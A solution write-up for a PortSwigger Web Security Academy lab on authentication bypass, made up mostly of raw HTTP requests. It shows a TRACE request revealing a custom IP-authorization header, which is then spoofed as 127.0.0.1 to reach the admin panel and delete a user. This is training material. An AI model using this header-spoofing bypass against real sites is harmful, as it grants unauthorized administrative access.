Port Swigger Authentication bypass via information
Solution
Login user: wiener
POST /login HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=qVjNrWkrzknpC3iydYvA8xXIsH4DvEeW
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Origin: https://0a180016039233fe8144399f00a60075.web-security-academy.net
Referer: https://0a180016039233fe8144399f00a60075.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
csrf=ufNtI2OEezJ7BSUMDdYZoPiaEkWtygdS&username=wiener&password=peter
---
GET /my-account?id=wiener HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180016039233fe8144399f00a60075.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Open admin panel: https://0a180016039233fe8144399f00a60075.web-security-academy.net/admin
Get error: Admin interface only available to local users
---
GET /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Edit request to admin panel
Change HTTP method from GET to TRACE
Focus on response: X-Custom-IP-Authorization we should change to local IP
---
TRACE /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
HTTP/2 200 OK
Content-Type: message/http
X-Frame-Options: SAMEORIGIN
Content-Length: 623
TRACE /admin HTTP/1.1
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
x-forwarded-for=localhost :
user-agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-language: pl,en-US;q=0.7,en;q=0.3
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
priority: u=0, i
te: trailers
cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
Content-Length: 0
X-Custom-IP-Authorization: 93.157.114.162
Login to admin panel with X-Custom-Ip-Authorization cookie
GET /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
X-Custom-Ip-Authorization: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Delete user: carlos
GET /admin HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
X-Custom-Ip-Authorization: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /admin/delete?username=carlos HTTP/2
Host: 0a180016039233fe8144399f00a60075.web-security-academy.net
Cookie: session=zEu09k6caoiztZzYXLX3v1phtardLEPn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
X-Custom-Ip-Authorization: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a180016039233fe8144399f00a60075.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Solved